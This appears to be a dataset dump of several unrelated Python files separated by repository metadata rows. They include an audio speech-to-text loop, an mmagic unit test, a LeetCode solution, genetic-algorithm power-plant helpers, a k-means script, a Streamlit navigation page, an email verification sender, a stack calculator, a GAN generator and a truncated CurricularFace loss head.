        self.rate = rate
        self.model_name = model_name

    def run(self):
        # translate() comes from the project-local `eval` module.
        print(translate(self.data, self.rate, self.model_name))
def IsActivate(activation_buffer, rate, chunk, last_sec, lb):
    """Return True when the peak amplitude over the last *last_sec* seconds
    of the queued frames reaches the loudness bound *lb*."""
    frames = list(activation_buffer.queue)
    window = int(rate / chunk * last_sec)  # number of chunks in last_sec
    peaks = [np.max(np.abs(frame)) for frame in frames]
    recent = peaks[-window:]
    return bool(np.max(recent) >= lb)
def SaveBuffer(buffer, filename, channels, audio_format, rate):
    """Write all frames queued in *buffer* to *filename* as a WAV file.

    NOTE(review): relies on the module-level `audio` (a pyaudio.PyAudio
    instance created in __main__) for the sample width — confirm this is
    only called after that instance exists.
    """
    frames = buffer.queue
    waveFile = wave.open(filename, 'wb')
    waveFile.setnchannels(channels)
    waveFile.setsampwidth(audio.get_sample_size(audio_format))
    waveFile.setframerate(rate)
    waveFile.writeframes(b''.join(frames))
    waveFile.close()
def BufferOutput(buffer):
    """Concatenate every queued raw frame into one flat list of int16 samples."""
    samples = []
    for raw in buffer.queue:
        samples.extend(np.frombuffer(raw, dtype=np.int16).tolist())
    return samples
if __name__ == "__main__":
    # Microphone capture parameters.
    FORMAT = pyaudio.paInt16
    CHANNELS = 1
    RATE = 16000
    CHUNK = 1024
    ACTIVATION_BUFFER = 5   # seconds of audio kept for loudness detection
    WAVE_OUTPUT_FILENAME = "./temp.wav"  # NOTE(review): unused (SaveBuffer call is commented out)
    PRETRAINED_MODEL_NAME = "facebook/s2t-small-librispeech-asr"
    audio = pyaudio.PyAudio()
    # start Recording
    stream = audio.open(format=FORMAT, channels=CHANNELS,
                    rate=RATE, input=True,
                    frames_per_buffer=CHUNK)
    isMonitoring = True
    isActivate = False
    prevActivate = False
    # NOTE(review): maxsize here is a float (RATE/CHUNK is 15.625) — Queue
    # accepts it, but an int was probably intended.
    activation_buffer = Queue(maxsize=RATE/CHUNK*ACTIVATION_BUFFER)
    buffer = Queue()
    #print(RATE/CHUNK*ACTIVATION_BUFFER)
    print("monitoring..")
    while(isMonitoring):
        # Read one chunk and keep a rolling window for activity detection.
        data = stream.read(CHUNK)
        numpydata = np.frombuffer(data, dtype=np.int16)
        if activation_buffer.full():
            activation_buffer.get()
        activation_buffer.put(numpydata)
        isActivate = IsActivate(activation_buffer, RATE, CHUNK, 2, lb=15000)
        if isActivate:
            print("recording...", end="\r")
            buffer.put(data)
        # Falling edge of activity = end of an utterance: normalise the
        # recorded samples and hand them to a background translation thread.
        if(prevActivate and not isActivate):
            #SaveBuffer(buffer, WAVE_OUTPUT_FILENAME, CHANNELS, FORMAT, RATE)
            inputs = BufferOutput(buffer)
            #inputs = (np.array(inputs) / 32767) * np.max(np.abs(inputs))
            inputs = (inputs - np.mean(inputs)) / np.std(inputs)
            t = TranslatingThread(inputs, RATE, PRETRAINED_MODEL_NAME)
            t.start()
            buffer.queue.clear()
            print("sentence end")
        prevActivate = isActivate
        #print(f"volume: {np.max(np.abs(numpydata))}")
        #print(f"queue size: {activation_buffer.qsize()}")
| true |
5c615a9d911b57c6ecabe1abf51453ba9e84c265 | Python | open-mmlab/mmagic | /tests/test_models/test_base_models/test_basic_interpolator.py | UTF-8 | 1,226 | 2.578125 | 3 | [
"Apache-2.0"
] | permissive | # Copyright (c) OpenMMLab. All rights reserved.
import torch
from torch import nn
from mmagic.models import BasicInterpolator
from mmagic.models.losses import L1Loss
from mmagic.registry import MODELS
@MODELS.register_module()
class InterpolateExample(nn.Module):
    """An example of interpolate network for testing BasicInterpolator."""
    def __init__(self):
        super().__init__()
        # A single 3x3 conv is enough for a smoke test.
        self.layer = nn.Conv2d(3, 3, 3, 1, 1)
    def forward(self, x):
        # Uses only x[:, 0] — assumes x is (n, t, c, h, w); confirm against caller.
        return self.layer(x[:, 0])
    def init_weights(self, pretrained=None):
        # No-op: random initialisation is fine for the test.
        pass
def test_basic_interpolator():
    """Smoke-test BasicInterpolator construction and frame split/merge."""
    model = BasicInterpolator(
        generator=dict(type='InterpolateExample'),
        pixel_loss=dict(type='L1Loss'))
    # The registry must resolve the configs to the concrete classes.
    assert model.__class__.__name__ == 'BasicInterpolator'
    assert isinstance(model.generator, InterpolateExample)
    assert isinstance(model.pixel_loss, L1Loss)
    # 9 frames -> 8 overlapping input pairs.
    input_tensors = torch.rand((1, 9, 3, 16, 16))
    input_tensors = model.split_frames(input_tensors)
    assert input_tensors.shape == (8, 2, 3, 16, 16)
    # Interleaving 9 originals with 8 interpolated frames yields 17 HWC images.
    output_tensors = torch.rand((8, 1, 3, 16, 16))
    result = model.merge_frames(input_tensors, output_tensors)
    assert len(result) == 17
    assert result[0].shape == (16, 16, 3)
| true |
cb2e685f9e3387660140cc212bea22b76a7991f2 | Python | smutek/learning-python | /unit-1/python-collections/exercise/stringcases.py | UTF-8 | 243 | 3.640625 | 4 | [] | no_license | # reversing a string, see http://stackoverflow.com/a/931095
def stringcases(string):
    """Return (UPPER, lower, Title Case, reversed) variants of *string*."""
    upper = string.upper()
    lower = string.lower()
    titled = string.title()
    reverse = string[::-1]  # slice with step -1 reverses the string
    return (upper, lower, titled, reverse)

print(stringcases("Row row row your boat down the stream"))
| true |
acb9b2abbc6e9b15b399ade2443bea40389580bd | Python | fengges/leetcode | /351-400/398. 随机数索引.py | UTF-8 | 323 | 3.0625 | 3 | [] | no_license | import random
class Solution:
    """398. Random Pick Index: bucket indices per value, sample uniformly."""

    def __init__(self, nums):
        """Map each value to the list of positions where it occurs."""
        self.dic = {}
        for idx, value in enumerate(nums):
            self.dic.setdefault(value, []).append(idx)

    def pick(self, target):
        """Return a uniformly random index whose value equals *target*."""
        candidates = self.dic[target]
        return candidates[random.randint(0, len(candidates) - 1)]
| true |
b6d55a6f3df3096b070fa24fa3486859c15582cc | Python | darkowic/ai-basics | /powerhouse-optimization/helpers.py | UTF-8 | 3,648 | 3.546875 | 4 | [] | no_license | #!/usr/bin/env python
from random import randint
class Powerhouse(object):
    """One power plant: quadratic fuel-cost curve and a 5-bit output level."""

    def __init__(self, p_min, p_max, a, b, c, s):
        """Store limits/coefficients and draw a random 5-bit state (MSB first)."""
        self.p_min = p_min
        self.p_max = p_max
        self.a = a
        self.b = b
        self.c = c
        self.s = s
        self.state = [randint(0, 1) for _ in range(5)]

    @property
    def power(self):
        """Output power implied by the current 5-bit level."""
        return self.calculate_power(self.level)

    @property
    def fuel_cost(self):
        """Fuel cost of producing the current output power."""
        return self.calculate_fuel_cost(self.power)

    @property
    def level(self):
        """Output level as a fraction in [0, 1]."""
        return self.calculate_level()

    def calculate_power(self, power_level):
        """Linear interpolation between p_min and p_max."""
        return self.p_min + (self.p_max - self.p_min) * power_level

    def calculate_fuel_cost(self, power):
        """Quadratic cost model: a + b*P + c*P^2."""
        return self.a + self.b * power + self.c * pow(power, 2)

    def calculate_level(self):
        """Normalise the 5-bit integer level to [0, 1] (31 == full power)."""
        return self.calculate_integer_level() / 31

    def calculate_integer_level(self):
        """Decode the MSB-first bit list into an integer in [0, 31]."""
        value = 0
        for bit in self.state:
            value = value * 2 + bit
        return value

    def level_increment(self):
        """Raise the level one step; return False when already at maximum."""
        current = self.calculate_integer_level()
        if current >= 31:
            return False
        self.state = [int(ch) for ch in '{:05b}'.format(current + 1)]
        return True

    def level_decrement(self):
        """Lower the level one step; return False when already at minimum."""
        current = self.calculate_integer_level()
        if current <= 0:
            return False
        self.state = [int(ch) for ch in '{:05b}'.format(current - 1)]
        return True
def get_state(candidate):
    """Flatten every powerhouse's bit state into one chromosome list."""
    return [bit for powerhouse in candidate for bit in powerhouse.state]
def apply_state(state, candidate):
    """Write the flat chromosome back into the powerhouses, 5 bits apiece."""
    offsets = range(0, len(state), 5)
    for which, offset in enumerate(offsets):
        candidate[which].state = state[offset:offset + 5]
def apply_mutation(state):
    """Flip one randomly chosen bit of the chromosome in place."""
    position = randint(0, len(state) - 1)
    state[position] = 0 if state[position] == 1 else 1
def one_point_crossing(input1, input2):
    """Single-point crossover: swap the tails of two parents at a random cut.

    The cut is drawn from [1, len-1] so both children mix genes from
    both parents.  Returns two new lists; the inputs are not modified.
    """
    cut = randint(1, len(input1) - 1)
    child1 = input1[:cut] + input2[cut:]
    child2 = input2[:cut] + input1[cut:]
    return child1, child2
def calculate_epsilon(candidate, demand):
    """Return produced power minus demand minus transmission losses (s*P^2)."""
    produced = sum(ph.power for ph in candidate)
    lost = sum(ph.s * ph.power ** 2 for ph in candidate)
    return produced - demand - lost
def network_cost(candidate):
    """Total fuel cost across all powerhouses."""
    return sum(ph.fuel_cost for ph in candidate)
def aim_function(candidate, demand, w):
    """Penalised objective: fuel cost plus *w* times the absolute power mismatch."""
    mismatch = abs(calculate_epsilon(candidate, demand))
    return network_cost(candidate) + w * mismatch
def fix_candidate(candidate, demand):
    """Nudge plant levels until the power mismatch is within +/-100.

    Raises output (starting with the lowest-level plants) when producing
    too little, lowers it (starting with the highest) when producing too
    much.  Returns False when no adjustment is needed or possible; note
    the `any()` calls short-circuit after the first plant that manages
    to move, so only one plant changes per outer iteration.
    """
    epsilon = calculate_epsilon(candidate, demand)
    if abs(epsilon) <= 100:
        return False
    if epsilon < 0:
        while epsilon < -100:
            candidate_sorted = sorted(candidate, key=lambda x: x.level)
            if not any(powerhouse.level_increment() for powerhouse in candidate_sorted):
                return False
            epsilon = calculate_epsilon(candidate, demand)
    else:
        while epsilon > 100:
            candidate_sorted = sorted(candidate, key=lambda x: x.level, reverse=True)
            if not any(powerhouse.level_decrement() for powerhouse in candidate_sorted):
                # NOTE(review): leftover debug print.
                print('not called even once!')
                return False
            epsilon = calculate_epsilon(candidate, demand)
| true |
febc6d18c8733d494437a4e5b1610f3e5d8accf3 | Python | ChangXiaodong/Leetcode-solutions | /3/437-Path_Sum_III.py | UTF-8 | 1,252 | 3.515625 | 4 | [] | no_license | # coding=utf-8
'''
后序遍历,求出左子节点可能出现的和,右子节点可能出现的和,本节点的和分别和左右子节点可能出现的和相加,如果等于sum,则计数+1
如果本节点的和自身等于sum,计数+1
'''
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    """437. Path Sum III — count downward paths whose values sum to target.

    Post-order traversal: each node returns the sums of all paths that
    start at that node and go straight down; every sum equal to the
    target bumps self.cnt while the lists bubble up to the parent.
    """
    def post_order(self, node, sum):
        """Return sums of all downward paths starting at *node*;
        increments self.cnt for every sum that hits the target."""
        if not node:
            return []
        below = self.post_order(node.left, sum) + self.post_order(node.right, sum)
        sums_here = []
        for partial in below:
            extended = partial + node.val
            sums_here.append(extended)
            if extended == sum:
                self.cnt += 1
        # A single-node path counts too.
        if node.val == sum:
            self.cnt += 1
        sums_here.append(node.val)
        return sums_here
    def pathSum(self, root, sum):
        """
        :type root: TreeNode
        :type sum: int
        :rtype: int
        """
        if not root:
            return 0
        self.cnt = 0
        self.post_order(root, sum)
        return self.cnt
| true |
e3ce88196d04245690f68c15105841fc88448d90 | Python | EwardJohn/Kmeans | /kmeans_clustrering.py | UTF-8 | 3,559 | 2.734375 | 3 | [] | no_license | import numpy as np
import matplotlib.pyplot as plt
def Json2txt(inpath, outpath, sample_size=4000):
    """Sample bbox origins from a COCO-style JSON and write them as text.

    Reads `annotations` from *inpath*, draws *sample_size* random entries
    (previously hard-coded to 4000 — the default keeps old behaviour) and
    writes "x y" per line, rounded to 2 decimals, to *outpath*.
    """
    import json    # fix: used but never imported at module level
    import random  # fix: used but never imported at module level

    with open(inpath, 'r', encoding='utf-8') as f:
        data = json.load(f)
    annotations = data['annotations']
    sampled = random.sample(annotations, sample_size)
    coords = [[round(a['bbox'][0], 2), round(a['bbox'][1], 2)] for a in sampled]
    # `with` closes the files; the original explicit close() calls were redundant.
    with open(outpath, 'w', encoding='utf-8') as w:
        for x, y in coords:
            w.write(str(x) + ' ' + str(y) + '\n')
def load_data(filename):
    """Load a whitespace-separated numeric text file as a numpy array."""
    points = np.loadtxt(filename)
    return points
def euclidian(x, y):
    """Euclidean distance between two points given as numpy arrays."""
    difference = x - y
    return np.linalg.norm(difference)
def Draw(k, centroids, min_position):
    """Plot the clustered points and animate the centroid trajectory.

    NOTE(review): re-loads the dataset from a hard-coded path, so this
    must match the file used by Kmeans().
    """
    # colors = [plt.cm.tab10(i/float(k-1)) for i in range(k)]
    colors = ['r','g','c','y']
    fig, ax = plt.subplots()
    dataset = load_data('./k-means_clustering/data2.txt')
    print(min_position)
    #------------------------------------------------------------------------------------------
    # Draw each cluster's points in its own colour.
    for index in range(k):
        mid_position = [i for i in range(len(min_position)) if min_position[i] == index]
        for ele in mid_position:
            ax.plot(dataset[ele][0],dataset[ele][1],(colors[index]+'o'))
    #------------------------------------------------------------------------------------------
    # Animate how the centroids move between iterations.
    points = []
    for index, mid_points in enumerate(centroids):
        for inner, content in enumerate(mid_points):
            if index == 0:
                points.append(ax.plot(content[0],content[1],'bo')[0])
            else:
                points[inner].set_data(content[0],content[1])
            print("centroids {} {}".format(index,content))
            plt.pause(0.8)
def Kmeans(k, elision=0, distance='euclidian'):
    """Run k-means on the hard-coded data file.

    Returns (final centroids, centroid history, point-to-cluster map).
    Iterates until the centroid movement drops to *elision* or below.
    NOTE(review): `dist` is computed once before the loop and again at
    the top of each iteration, so the first loop test uses the distance
    from the random initial centroids to zeros.
    """
    centroids = []
    if distance == 'euclidian':
        dist_method = euclidian
    dataset = load_data('./k-means_clustering/data2.txt')
    num_instances, num_features = dataset.shape
    # Pick k random rows as the initial centroids.
    samples = dataset[np.random.randint(0,num_instances-1,size=k)]
    centroids.append(samples)
    old_samples = np.zeros(samples.shape)
    min_position = np.zeros((num_instances,1))
    dist = dist_method(samples,old_samples)
    num = 0  # iteration counter (diagnostic only)
    while dist > elision:
        num += 1
        dist = dist_method(samples,old_samples)
        old_samples = samples
        #-----------------------------------------------------------------------------------------
        #calculate the distances between samples and dateset and record the min value's position
        for index, instances in enumerate(dataset):
            dist_list = np.zeros((k,1))
            for numbers, element in enumerate(samples):
                dist_list[numbers] = dist_method(instances,element)
            min_position[index,0] = np.argmin(dist_list)
        tem_result = np.zeros((k, num_features))
        #-----------------------------------------------------------------------------------------
        #calculate the mean value of different groups and update the samples
        for index_samples in range(len(samples)):
            mid_position = [i for i in range(len(min_position)) if min_position[i] == index_samples]
            sample = np.mean(dataset[mid_position], axis=0)
            tem_result[index_samples, :] = sample
        samples = tem_result
        centroids.append(tem_result)
    return samples, centroids, min_position
if __name__ == "__main__":
    # fix: the second argument had a stray trailing quote ('./data2.txt'')
    # which made this line a SyntaxError.
    Json2txt('./train.json', './data2.txt')
    samples, centroids, min_position = Kmeans(4)
    Draw(4, centroids, min_position)
| true |
2343d3a25af06cd3b629ccec73d08b3f16f9d5ef | Python | ttsiodras/UnblockMeSolver | /stats.py | UTF-8 | 764 | 3.125 | 3 | [] | no_license | import math
# Python 2 script: read one float per line from stdin and print summary
# statistics (mean, population/sample stddev, median, min, max).
total = totalSq = n = 0
allOfThem = []
while True:
    try:
        a = float(raw_input())
    except:
        # EOF or a non-numeric line ends the input loop.
        break
    total += a
    totalSq += a * a
    n += 1
    allOfThem.append(a)
# Population variance (divide by n) vs sample variance (divide by n-1),
# both via the sum-of-squares identity.
varianceFull = (totalSq - total * total / n) / n
variance = (totalSq - total * total / n) / (n - 1)
srted = sorted(allOfThem)
measurements = [
    ("Total samples", n),
    ("Average value", total / n),
    ("Std deviation", math.sqrt(varianceFull)),
    ("Sample stddev", math.sqrt(variance)),
    # For even n this is the upper of the two middle values.
    ("Median", srted[len(allOfThem) / 2]),
    ("Min", srted[0]),
    ("Max", srted[-1]),
    ("Overall", str(total / n) + " +/- " + "%2.1f%%" %
        (100 * math.sqrt(variance) * n / total))
]
for label, value in measurements:
    print "%*s:" % (15, label), value
| true |
6f73a4f7af8979552aa30de88ef7e5e47ffcde69 | Python | subhashissarangi/PYTHON_NEW | /src/recursion/FibonacciNumbers.py | UTF-8 | 627 | 2.953125 | 3 | [] | no_license | '''
Created on 31-Jan-2020
@author: SUBHASHIS
'''
from builtins import object
from pip._internal.utils.outdated import SELFCHECK_DATE_FMT
class Fibonacci(object):
    # NOTE(review): placeholder class — never instantiated below; the
    # builtins/pip imports at the top of the file are unused as well.
    def __init__(self) :
        pass
n=int(input("please anter a number to get fibonacci: "))
def fib(n):
    """Return the n-th Fibonacci number via naive double recursion."""
    if n == 0:
        return 0
    if n == 1:
        return 1
    # Exponential-time textbook recursion.
    return fib(n - 1) + fib(n - 2)
def fibi(n):
    """Iterative Fibonacci: O(n) time, O(1) space."""
    if n == 0:
        return 0
    previous, current = 0, 1
    for _ in range(n - 1):
        previous, current = current, previous + current
    return current
return new
print(fib(n))
print(fibi(n))
| true |
cb9708af4fa80ea57c9bc82285fe0acedb1b314e | Python | o2yama/py00-lite | /ex/ex1/today.py | UTF-8 | 91 | 2.78125 | 3 | [] | no_license | import datetime
# Print today's calendar date (the Japanese label means "today's date").
today = datetime.date.today()
print('今日の日付 : {0}'.format(today))
c4ecfc6da3e6e2552a821e7c691e39247fc13cfe | Python | itsfarhanabidi/TESTUBE.ai | /WebApp/Navigation_Window.py | UTF-8 | 2,263 | 2.53125 | 3 | [] | no_license | import streamlit as st
import os
import keyboard
#################################################################################
st.set_page_config(page_title = "Navigation Window")
#################################################################################
# Inject a local stylesheet into the Streamlit page.
def local_css(file_name):
    with open(file_name) as f:
        st.markdown(f'<style>{f.read()}</style>', unsafe_allow_html=True)
local_css("navigation_style.css")
# Link a remote stylesheet (used for Material icons below).
def remote_css(url):
    st.markdown(f'<link href="{url}" rel="stylesheet">', unsafe_allow_html=True)
remote_css('https://fonts.googleapis.com/icon?family=Material+Icons')
#################################################################################
st.markdown("""<div class="title">Navigation Window</div>""",True)
st.write("")
st.write("")
st.write("")
st.write("")
st.write("")
st.write("")
# First row of navigation buttons (columns 2 and 4 act as spacers).
col_1, col_2, col_3, col_4, col_5 = st.beta_columns(5)
predict = col_1.button("Predict a Chest X-ray")
search = col_3.button("Search & View Patients")
edit = col_5.button("Edit Patient Records")
st.write("")
st.write("")
st.write("")
st.write("")
st.write("")
# Second row of navigation buttons.
col_1, col_2, col_3, col_4, col_5 = st.beta_columns(5)
add_test = col_1.button("Add Patient Test")
add_pres = col_3.button("Add Prescription")
data_analysis = col_5.button("Data Analysis Report")
# Each button closes the current browser tab (Ctrl+W) and launches the
# target page as a new Streamlit process.
# NOTE(review): the paths are hard-coded absolute Windows paths — this
# only works on the original development machine.
if (predict):
    keyboard.press_and_release('ctrl + w')
    path = r"C:\Users\Admin\Desktop\UI_Phase2\UITesting.py"
    os.system(f"streamlit run {path}")
elif (search):
    keyboard.press_and_release('ctrl + w')
    path = r"C:\Users\Admin\Desktop\UI_Phase2\search_page.py"
    os.system(f"streamlit run {path}")
elif (edit):
    keyboard.press_and_release('ctrl + w')
    path = r"C:\Users\Admin\Desktop\UI_Phase2\edit_page.py"
    os.system(f"streamlit run {path}")
elif(add_test):
    keyboard.press_and_release('ctrl + w')
    path = r"C:\Users\Admin\Desktop\UI_Phase2\PMS_page.py"
    os.system(f"streamlit run {path}")
elif(add_pres):
    keyboard.press_and_release('ctrl + w')
    path = r"C:\Users\Admin\Desktop\UI_Phase2\prescription_page.py"
    os.system(f"streamlit run {path}")
elif(data_analysis):
    keyboard.press_and_release('ctrl + w')
    path = r"C:\Users\Admin\Desktop\UI_Phase2\data_analysis_page.py"
    os.system(f"streamlit run {path}")
| true |
1f42865089e4d31a8141360dff7b299af108df15 | Python | seungkilee-cs/utilities | /python/kakaopage-ripper.py | UTF-8 | 1,241 | 2.53125 | 3 | [] | no_license | import selenium
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
import urllib
import urllib.request
from selenium.common.exceptions import NoSuchElementException
# URL of the first episode's viewer page.
URL = "https://page.kakao.com/viewer?productId=54417128"
# Chrome driver setup.
driver = webdriver.Chrome(executable_path='chromedriver')
driver.implicitly_wait(time_to_wait=1)
driver.get(URL)
name = '프로야구 생존기'
# How many episodes to download.
ep_num = 3
# For each episode: click into the reader, save every page image, then
# advance to the next episode.
for ep in range(0, ep_num):
    try:
        first = driver.find_element_by_xpath('/html/body/div[4]/div/div/div/img')
        first.click()
    except NoSuchElementException:
        # Fallback xpath — the page layout apparently varies; confirm selectors.
        first = driver.find_element_by_xpath('/html/body/div[3]/div/div/div/img')
        first.click()
    img_num = 1
    while True:
        try:
            img = driver.find_element_by_xpath('//*[@id="root"]/div[3]/div/div/div/div/div[1]/div[' + str(img_num) + ']/img')
            src = img.get_attribute('src')
            # NOTE(review): the filename only contains the image index, so
            # each episode overwrites the previous one's files.
            urllib.request.urlretrieve(src, '프로야구 생존기_%03d'%(img_num))
        except NoSuchElementException:
            # No more page images in this episode.
            break
        img_num = img_num + 1
    next_ep = driver.find_element_by_xpath('//*[@id="kpw-header"]/div[2]/span[4]')
    next_ep.click()
| true |
b27335320a0d22c13f330ad2157968b0919cbaa0 | Python | SuperKuroko/ECNU-2021-Spring-MySQL-Project | /source_code/sent_email.py | UTF-8 | 1,272 | 2.671875 | 3 | [] | no_license | import re
import smtplib
import random
from email.mime.text import MIMEText
def email_type(email):
    """Classify an address: 0 = test domain (@test.*), 1 = valid, -1 = invalid."""
    test_pattern = re.compile("^[a-zA-Z0-9_-]+@test+(\.[a-zA-Z0-9_-]+)+$")
    generic_pattern = re.compile("^[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)+$")
    # Check the more specific test-domain pattern first.
    if test_pattern.match(email):
        return 0
    if generic_pattern.match(email):
        return 1
    return -1
def sent_email(receiver):
    """Send a 6-digit verification code to *receiver* over SMTP-SSL.

    Returns the code string on success, or the SMTP error text on
    failure — callers must distinguish the two.
    NOTE(review): the host/user/password placeholders below must be
    filled in before this can work.
    """
    mail_host = "" #such as stmp.qq.com
    mail_user = "" #such as xxx@xxx.com
    mail_pass = "" #not your account password!
    sender = ""
    title = "饱了没-邮箱验证码"
    # Build a random 6-digit code (leading zeros allowed).
    code = ""
    for i in range(6):
        code += str(random.randint(0, 9))
    content = "【饱了没】验证码:%s,请在 5 分钟内完成操作。如非本人操作,请忽略。" % code
    message = MIMEText(content, "plain", "utf-8")
    message["From"] = "{}".format(sender)
    message["To"] = ",".join(receiver)
    message["Subject"] = title
    try:
        smtp_object = smtplib.SMTP_SSL(mail_host, 465)
        smtp_object.login(mail_user, mail_pass)
        smtp_object.sendmail(sender, receiver, message.as_string())
        return code
    except smtplib.SMTPException as error:
        return str(error)
return str(error)
if __name__ == "__main__":
    # Manual-test stub; uncomment the print to try the classifier.
    pass
    #print(email_type("123456@test.com"))
| true |
34a4a7d471f3365bcb824212832311c2cf7befa7 | Python | UWPCE-PythonCert-ClassRepos/SP_Online_Course2_2018 | /students/JerryH/Lesson06/calculator/calculator.py | UTF-8 | 1,625 | 4.03125 | 4 | [] | no_license | """
Calculator module
"""
from .exceptions import InsufficientOperands
class Calculator():
    """
    Stack-based calculator: numbers are pushed onto a stack and the
    binary operator objects consume the two oldest entries.
    """

    def __init__(self, adder, subtracter, multiplier, divider):
        """
        Store the four operator objects and start with an empty stack.
        """
        self.adder = adder
        self.subtracter = subtracter
        self.multiplier = multiplier
        self.divider = divider
        self.stack = []

    def enter_number(self, number):
        """
        Push *number* onto the end of the stack.
        """
        self.stack.append(number)

    def _do_calc(self, operator):
        """
        Apply *operator* to the two oldest stack entries and replace
        the whole stack with the single result.  Division by zero
        yields 0; fewer than two operands raises InsufficientOperands.
        """
        try:
            result = operator.calc(self.stack[0], self.stack[1])
        except ZeroDivisionError:
            result = 0
        except IndexError:
            raise InsufficientOperands
        self.stack = [result]
        return result

    def add(self):
        """
        Sum of the two oldest stack entries.
        """
        return self._do_calc(self.adder)

    def subtract(self):
        """
        Difference of the two oldest stack entries.
        """
        return self._do_calc(self.subtracter)

    def multiply(self):
        """
        Product of the two oldest stack entries.
        """
        return self._do_calc(self.multiplier)

    def divide(self):
        """
        Quotient of the two oldest stack entries.
        """
        return self._do_calc(self.divider)
| true |
efc79709e4ea01cb7e91995954ec18a88e5051fe | Python | marqueze23/curso-python | /conjuntos.py | UTF-8 | 229 | 3.4375 | 3 | [] | no_license | conjuntos=set()
conjuntos={1,2,3,"Hola","humano",1,2,3}
print(conjuntos)
#conjuntos.append(5)
conjuntos.add(5)
print(conjuntos)
print("3 in conjuntos=",3 in conjuntos)
conjuntos.discard(1)
print("conjuntos.discard(1)=",conjuntos) | true |
af70e3013ec8e912ccfbe449fbe88c26821ccb4b | Python | xj-xx/CVAE-GAN-zoos-PyTorch-Beginner | /WGAN-GP/WDCGAN-GP_TEST.py | UTF-8 | 1,283 | 2.625 | 3 | [] | no_license | import torch.nn as nn
import matplotlib.pyplot as plt
import torch
from torchvision.utils import make_grid
import numpy as np
class generator(nn.Module):
    """WDCGAN generator: latent vector -> single-channel image in [-1, 1].

    The fully connected layer must produce num_feature == 1 * 56 * 56
    values, since forward() reshapes its output to (N, 1, 56, 56); the
    final stride-2 convolution then halves the spatial size to 28x28.
    """

    def __init__(self, input_size, num_feature):
        super(generator, self).__init__()
        # Project the latent vector up to a flat 56*56 feature map.
        self.fc = nn.Linear(input_size, num_feature)
        # Normalise and activate the reshaped single-channel map.
        self.br = nn.Sequential(nn.BatchNorm2d(1), nn.ReLU(True))
        # Conv stack: 1 -> 64 -> 32 channels at full resolution, then a
        # stride-2 conv back down to one channel with tanh squashing.
        self.gen = nn.Sequential(
            nn.Conv2d(1, 64, 3, stride=1, padding=1),
            nn.BatchNorm2d(64),
            nn.ReLU(True),
            nn.Conv2d(64, 32, 3, stride=1, padding=1),
            nn.BatchNorm2d(32),
            nn.ReLU(True),
            nn.Conv2d(32, 1, 3, stride=2, padding=1),
            nn.Tanh(),
        )

    def forward(self, x):
        flat = self.fc(x)
        image = flat.view(flat.shape[0], 1, 56, 56)
        return self.gen(self.br(image))
G = generator(100,1*56*56)
if torch.cuda.is_available():
    G = G  # NOTE(review): no-op — presumably G.cuda() was intended
g_optimizer = torch.optim.Adam(G.parameters(), lr=0.0003)  # NOTE(review): created but never used
# Load the trained generator weights (file must exist next to the script).
G.load_state_dict(torch.load('./generator_WDCGAN-GP.pth'))
z_dimension = 100
# Sample 80 latent vectors and render the generated digits in an 8-wide grid.
z = torch.randn((80, z_dimension))
fake_img = G(z)
img = make_grid(fake_img,nrow=8).clamp(0,1).detach().numpy()
plt.imshow(np.transpose(img,(1,2,0)))
plt.show()
| true |
1f7979014f79a6cfbd57fb87fd80ef7d36246930 | Python | GitDataNet/gitdata | /tests/test_io.py | UTF-8 | 1,571 | 2.9375 | 3 | [] | no_license | #!/usr/bin/python
# -*- coding: utf-8 -*-
import unittest
import tempfile
import os
from gitdata import get_file_list
from gitdata import file_sha1sum
from gitdata import files_sha1sum
class TestIO(unittest.TestCase):
    """Tests for gitdata's file listing and SHA-1 helpers.

    NOTE(review): `assertItemsEqual` below exists only on Python 2
    (Python 3 renamed it to assertCountEqual) — confirm the target
    interpreter.  The temp directory is never removed and the files are
    opened without being explicitly closed.
    """
    @classmethod
    def setUpClass(cls):
        # Create <tempdir>/files containing two files whose content is
        # their own name.
        cls.tempdir = tempfile.mkdtemp()
        cls.dir_name = 'files'
        cls.files_dir = os.path.join(cls.tempdir, cls.dir_name)
        os.mkdir(cls.files_dir)
        new_files = ['file1.txt', 'file2.txt']
        for fname in new_files:
            open(os.path.join(cls.files_dir, fname), 'w').write(fname)
    def test_list_files(self):
        # get_file_list returns paths relative to the current directory.
        os.chdir(self.tempdir)
        paths = ['files/file1.txt', 'files/file2.txt']
        self.assertItemsEqual(get_file_list(self.dir_name), paths)
    def test_file_sha1sum(self):
        # SHA-1 of the literal content "file1.txt".
        file_path = os.path.join(self.files_dir, 'file1.txt')
        self.assertEqual(
            file_sha1sum(file_path),
            'ce1be0ff4065a6e9415095c95f25f47a633cef2b'
        )
    def test_file_sha1sum_file_not_found(self):
        # A missing file yields None rather than an exception.
        file_path = os.path.join(self.files_dir, 'fail_file.txt')
        self.assertEqual(file_sha1sum(file_path), None)
    def test_files_sha1sum(self):
        # Bulk hashing maps each path to its individual digest.
        path_list = get_file_list(self.files_dir)
        expected = {
            os.path.join(self.files_dir, 'file1.txt'):
                'ce1be0ff4065a6e9415095c95f25f47a633cef2b',
            os.path.join(self.files_dir, 'file2.txt'):
                'c2edf7b002d0354039a8aaba3bc53180caf3d248',
        }
        self.assertEqual(files_sha1sum(path_list), expected)
| true |
d49c088ebaaaa0b4f30dbdbbf73258675f0e934a | Python | hexieshenghuo/FaceX-Zoo | /head/CurricularFace.py | UTF-8 | 1,889 | 2.65625 | 3 | [
"Apache-2.0"
] | permissive | """
@author: Jun Wang
@date: 20201126
@contact: jun21wangustc@gmail.com
"""
# based on
# https://github.com/HuangYG123/CurricularFace/blob/master/head/metrics.py
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import Parameter
import math
class CurricularFace(nn.Module):
    """Implementation for "CurricularFace: Adaptive Curriculum Learning Loss for Deep Face Recognition".

    Produces s-scaled cosine logits where the target class gets an
    additive angular margin m and hard negatives (cos > cos(theta+m))
    are re-weighted by an adaptive factor t that tracks the mean target
    logit with an exponential moving average.
    """
    def __init__(self, feat_dim, num_class, m = 0.5, s = 64.):
        super(CurricularFace, self).__init__()
        self.m = m                                # angular margin
        self.s = s                                # logit scale
        self.cos_m = math.cos(m)
        self.sin_m = math.sin(m)
        # Beyond this threshold cos(theta + m) would wrap past pi, so the
        # linear fallback (target - mm) is used instead.
        self.threshold = math.cos(math.pi - m)
        self.mm = math.sin(math.pi - m) * m
        # Class-weight matrix (feat_dim x num_class), column-normalised in forward.
